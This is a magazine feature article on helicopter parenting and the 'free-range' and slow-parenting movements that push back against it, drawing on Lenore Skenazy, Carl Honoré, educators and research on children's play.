Overparenting had been around long before Douglas MacArthur's mom Pinky moved with him to West Point in 1899 and took an apartment near the campus, supposedly so she could watch him with a telescope to be sure he was studying. But in the 1990s something dramatic happened, and the needle went way past the red line. From peace and prosperity, there arose fear and anxiety; crime went down, yet parents stopped letting kids out of their sight; the percentage of kids walking or biking to school dropped from 41% in 1969 to 13% in 2001. Death by injury has dropped more than 50% since 1980, yet parents lobbied to take the jungle gyms out of playgrounds, and strollers suddenly needed the warning label "Remove Child Before Folding." Among 6-to-8-year-olds, free playtime dropped 25% from 1981 to '97, and homework more than doubled. Bookstores offered Brain Foods for Kids: Over 100 Recipes to Boost Your Child's Intelligence. The state of Georgia sent every newborn home with the CD Build Your Baby's Brain Through the Power of Music, after researchers claimed to have discovered that listening to Mozart could temporarily help raise IQ scores by as many as 9 points. By the time the frenzy had reached its peak, colleges were installing "Hi, Mom!" webcams in common areas, and employers like Ernst & Young were creating "parent packs" for recruits to give Mom and Dad, since they were involved in negotiating salary and benefits.
Once obsessing about kids' safety and success became the norm, a kind of orthodoxy took hold, and heaven help the heretics — the ones who were brave enough to let their kids venture outside without Secret Service protection. Just ask Lenore Skenazy, who to this day, when you Google "America's Worst Mom," fills the first few pages of results — all because one day last year she let her 9-year-old son ride the New York City subway alone. A newspaper column she wrote about it somehow ignited a global firestorm over what constitutes reasonable risk. She had reporters calling from China, Israel, Australia, Malta. ("Malta! An island!" she marvels. "Who's stalking the kids there? Pirates?") Skenazy decided to fight back, arguing that we have lost our ability to assess risk. By worrying about the wrong things, we do actual damage to our children, raising them to be anxious and unadventurous or, as she puts it, "hothouse, mama-tied, danger-hallucinating joy extinguishers."
Skenazy, a Yale-educated mom who with her husband is raising two boys in New York City, had ingested all the same messages as the rest of us. Her sons' school once held a pre-field-trip assembly explaining exactly how close to a hospital the children would be at all times. She confesses to being "at least part Sikorsky," hiring a football coach for a son's birthday and handing out mouth guards as party favors. But when the Today show had her on the air to discuss her subway decision, interviewer Ann Curry turned to the camera and asked, "Is she an enlightened mom or a really bad one?"
From that day and the food fight that followed, she launched her Free Range Kids blog, which eventually turned into her own Dangerous Book for Parents: Free-Range Kids: Giving Our Children the Freedom We Had Without Going Nuts with Worry. There is no rational reason, she argues, that a generation of parents who grew up walking alone to school, riding mass transit, trick-or-treating, teeter-tottering and selling Girl Scout cookies door to door should be forbidding their kids to do the same. But somehow, she says, "10 is the new 2. We're infantilizing our kids into incompetence." She celebrates seat belts and car seats and bike helmets and all the rational advances in child safety. It's the irrational responses that make her crazy, like when Dear Abby endorses the idea, as she did in August, that each morning before their kids leave the house, parents take a picture of them. That way, if they are kidnapped, the police will have a fresh photo showing what clothes they were wearing. Once the kids make it home safe and sound, you can delete the picture and take a new one the next morning.
That advice may seem perfectly sensible to parents bombarded by heartbreaking news stories about missing little girls and the predator next door. But too many parents, says Skenazy, have the math all wrong. Refusing to vaccinate your children, as millions now threaten to do in the case of the swine flu, is statistically reckless; on the other hand, there are no reports of a child ever being poisoned by a stranger handing out tainted Halloween candy, and the odds of being kidnapped and killed by a stranger are about 1 in 1.5 million. When parents confront you with "How can you let him go to the store alone?," she suggests countering with "How can you let him visit your relatives?" (Some 80% of kids who are molested are victims of friends or relatives.) Or ride in the car with you? (More than 430,000 kids were injured in motor vehicles last year.) "I'm not saying that there is no danger in the world or that we shouldn't be prepared," she says. "But there is good and bad luck and fate and things beyond our ability to change. The way kids learn to be resourceful is by having to use their resources." Besides, she says with a smile, "a 100%-safe world is not only impossible. It's nowhere you'd want to be."
Dispatches from the Front Lines
Eleven parents are sitting in a circle in an airy, glass-walled living room in south Austin, Texas, eating organic, gluten-free, nondairy coconut ice cream. This is a Slow Family Living class, taught by perinatal psychologist Carrie Contey and Bernadette Noll. "Our whole culture," says Contey, 38, "is geared around 'Is your kid making the benchmarks?' There's this fear of 'Is my kid's head the right size?' People think there's some mythical Good Mother out there that they aren't living up to and that it's hurting their child. I just want to pull the plug on that."
The parents seem relieved to hear it. Matt, a textbook editor, reports that he and his wife quit a book club because it caused too much stress on book-club nights, and stopped fussing about how the house looks, which brings nods all around the room: let go of perfectionism in all its tyranny. Margaret, a publishing executive, tells her own near-miss story of how she stepped back from the brink of insanity. On her son's fourth birthday, she says, "I'm like 'Oh, my God, he's eligible for Suzuki!' I literally got on the phone and called 12 Suzuki teachers," she says, before realizing the nightmare she was creating for herself and her child. Shutting down your inner helicopter isn't easy. "This is not a shift in perspective that occurs overnight," Matt admits after class. "And it's not every day that I consciously sit down and ask myself hard questions about how I want family life to be slower or better."
Fear is a kind of parenting fungus: invisible, insidious, perfectly designed to decompose your peace of mind. Fear of physical danger is at least subject to rational argument; fear of failure is harder to hose down. What could be more natural than worrying that your child might be trampled by the great, scary, globally competitive world into which she will one day be launched? It is this fear that inspires parents to demand homework in preschool, produce the snazzy bilingual campaign video for the third-grader's race for class rep, continue to provide the morning wake-up call long after he's headed off to college.
Some of the hovering is driven by memory and demography. This generation of parents, born after 1964, waited longer to marry and had fewer children. Families are among the smallest in history, which means our genetic eggs are in fewer baskets and we guard them all the more zealously. Helicopter parents can be found across all income levels, all races and ethnicities, says Patricia Somers of the University of Texas at Austin, who spent more than a year studying the species at the college level. "There are even helicopter grandparents," she notes, who turn up with their elementary-school grandchildren for college-information sessions aimed at juniors and seniors.
Nor is this phenomenon limited to ZIP codes where every Volvo wagon just has to have a University of Chicago sticker on it. "I'm having exactly the same conversations with coaches, teachers, parents, counselors, whether I'm in Wichita or northern Canada or South America," says Honoré. His own revelation came while listening to the feedback about his son in kindergarten. It was fine, but nothing stellar — until he got to the art room and the teacher began raving about how creative his son was, pointing out his sketches that she'd displayed as models for other students. Then, Honoré recalls, "she dropped the G-bomb: 'He's a gifted artist,' she told us, and it was one of those moments when you don't hear anything else. I just saw the word gifted in neon with my son's name ..." So he hurried home and Googled the names of art tutors and eagerly told his son all about the special person who would help him draw even better. "He looks at me like I'm from outer space," Honoré says. "'I just wanna draw,' he tells me. 'Why do grownups have to take over everything?' "
"That was a searing epiphany," Honoré concludes. "I didn't like what I saw." He now writes and lectures about the many fruits of slowing down, citing research that suggests the brain in its relaxed state is more creative, makes more nuanced connections and is ripe for eureka moments. "With children," he argues, "they need that space not to be entertained or distracted. What boredom does is take away the noise ... and leave them with space to think deeply, invent their own game, create their own distraction. It's a useful trampoline for children to learn how to get by."
Other studies reinforce the importance of play as an essential protein in a child's emotional diet; were it not, argue some scientists, it would not have persisted across species and millenniums, perhaps as a way to practice for adulthood, to build leadership, sociability, flexibility, resilience — even as a means of literally shaping the brain and its pathways. Dr. Stuart Brown, a psychiatrist and the founder of the National Institute for Play — who has a treehouse above his office — recalls in a recent book how managers at Caltech's Jet Propulsion Laboratory (JPL) noticed the younger engineers lacked problem-solving skills, though they had top grades and test scores. Realizing the older engineers had more play experience as kids — they'd taken apart clocks, built stereos, made models — JPL eventually incorporated questions about job applicants' play backgrounds into interviews. "If you look at what produces learning and memory and well-being" in life, Brown has argued, "play is as fundamental as any other aspect.'' The American Academy of Pediatrics warns that the decrease in free playtime could carry health risks: "For some children, this hurried lifestyle is a source of stress and anxiety and may even contribute to depression." Not to mention the epidemic of childhood obesity in a generation of kids who never just go out and play.
Remember, Mistakes Are Good
Many educators have been searching for ways to tell parents when to back off. It's a tricky line to walk, since studies link parents' engagement in a child's education to better grades, higher test scores, less substance abuse and better college outcomes. Given a choice, teachers say, overinvolved parents are preferable to invisible ones. The challenge is helping parents know when they are crossing a line.
Every teacher can tell the story of a student who needed to fail in order to be reassured that the world wouldn't come to an end. Yet teachers now face a climate in which parents ghostwrite students' homework, airbrush their lab reports — then lobby like a K Street hired gun for their child to be assigned to certain classes. Principal Karen Faucher instituted a "no rescue" policy at Belinder Elementary in Prairie Village, Kans., when she noticed the front-office table covered each day with forgotten lunch boxes and notebooks, all brought in by parents. The tipping point was the day a mom rushed in with a necklace meant to complete her daughter's coordinated outfit. "I'm lucky — I deal with intelligent parents here," Faucher says. "But you saw very intelligent parents doing very stupid things. It was almost like a virus. The parents knew that was not what they intended to do, but they couldn't help themselves." A guidance counselor at a Washington prep school urges parents to find a mentor of a certain disposition. "Make friends with parents," she advises, "who don't think their kids are perfect." Or with parents who are willing to exert some peer pressure of their own: when schools debate whether to drop recess to free up more test-prep time, parents need to let a school know if they think that's a trade-off worth making.
A certain amount of hovering is understandable when it comes to young children, but many educators are concerned when it persists through middle school and high school. Some teachers talk of "Stealth Fighter Parents," who no longer hover constantly but can be counted on for a surgical strike just when the high school musical is being cast or the starting lineup chosen. And senior year is the witching hour: "I think for a lot of parents, college admissions is like their grade report on how they did as a parent," observes Madeleine Rhyneer, dean of students at Willamette University in Oregon. Many colleges have had to invent a "director of parent programs" to run regional groups so moms and dads can meet fellow college parents or attend special classes where they can learn all the school cheers. The Ithaca College website offers a checklist of advice: "Visit (but not too often)"; "Communicate (but not too often)"; "Don't worry (too much)"; "Expect change"; "Trust them."
Teresa Meyer, a former PTA president at Hickman High in Columbia, Mo., has just sent the youngest of her three daughters to college. "They made it very clear: You are not invited to the registration part where they're requesting classes. That's their job." She's come to appreciate the please-back-off vibe she's encountered. "I hope that we're getting away from the helicopter parenting," Meyer says. "Our philosophy is 'Give 'em the morals, give 'em the right start, but you've got to let them go.' They deserve to live their own lives."
What You Can Do
Among the most powerful weapons in the war against the helicopter brigade is the explosion of websites where parents can confide, confess and affirm their sense that lowering expectations is not the same as letting your children down. So you gave up trying to keep your 2-year-old from eating the dog's food? You banged your son's head on the doorway while giving him a piggyback ride? Your daughter hates school and is so scared of failure she won't even try to ride a bike? "I just want to throw in the towel and give up on her," one mom posts on Truuconfessions.com. "This is NOT what I thought I was signing up for." Honestbaby.com sells baby T-shirts that say "I'll walk when I'm good and ready." Given how many books and websites drove a generation of parents mad with anxiety, a certain balance is restored to the universe when it becomes conventional for people to brag about what bad parents they are.
The revolutionary leaders are careful about offering too much advice. Parents have gotten plenty of that, and one of the goals of this new movement is to give parents permission to disagree or at least follow different roads. "People feel there's somehow a secret formula for parenting, and if we just read enough books and spend enough money and drive ourselves hard enough, we'll find it, and all will be O.K.," Honoré observes. "Can you think of anything more sinister, since every child is so different, every family is different? Parents need to block out the sound and fury from the media and other parents, find that formula that fits your family best."
Kim John Payne, author of Simplicity Parenting, teaches seminars on how to peel back the layers of cultural pressure that weigh down families. He and his coaches will even go into your home, weed out your kids' stuff, sort out their schedule, turn off the screens and help your family find space you didn't know you had, like a master closet reorganizer for the soul. But any parent can do it just as well. "We need to quit bombarding them with choices way before their ability to handle them," Payne says. The average child has 150 toys. "When you cut the toys and clothes back ... the kids really like it." He aims for a cut of roughly 75%: he tosses out the broken toys and gives away the outgrown ones and the busy, noisy, blinking ones that do the playing for you. Pare down to the classics that leave the most to the child's imagination and create a kind of toy library kids can visit and swap from. Then build breaks of calm into their schedule so they can actually enjoy the toys.
Finally, there is the gift of humility, which parents need to offer one another. We can fuss and fret and shuttle and shelter, but in the end, what we do may not matter as much as we think. Freakonomics authors Stephen Dubner and Steven Levitt analyzed a Department of Education study tracking the progress of kids through fifth grade and found that things like how much parents read to their kids, how much TV kids watch and whether Mom works make little difference. "Frequent museum visits would seem to be no more productive than trips to the grocery store," they argued in USA Today. "By the time most parents pick up a book on parenting technique, it's too late. Many of the things that matter most were decided long ago — what kind of education a parent got, what kind of spouse he wound up with and how long they waited to have children."
If you embrace this rather humbling reality, it will be easier to follow the advice D.H. Lawrence offered back in 1918: "How to begin to educate a child. First rule: leave him alone. Second rule: leave him alone. Third rule: leave him alone. That is the whole beginning."
Of course, that was easy for him to say. He had no kids.
— With reporting by Karen Ball / Kansas City, Mo.; Alexandra Silver / New York City; and Elizabeth Dias and Sophia Yan / Washington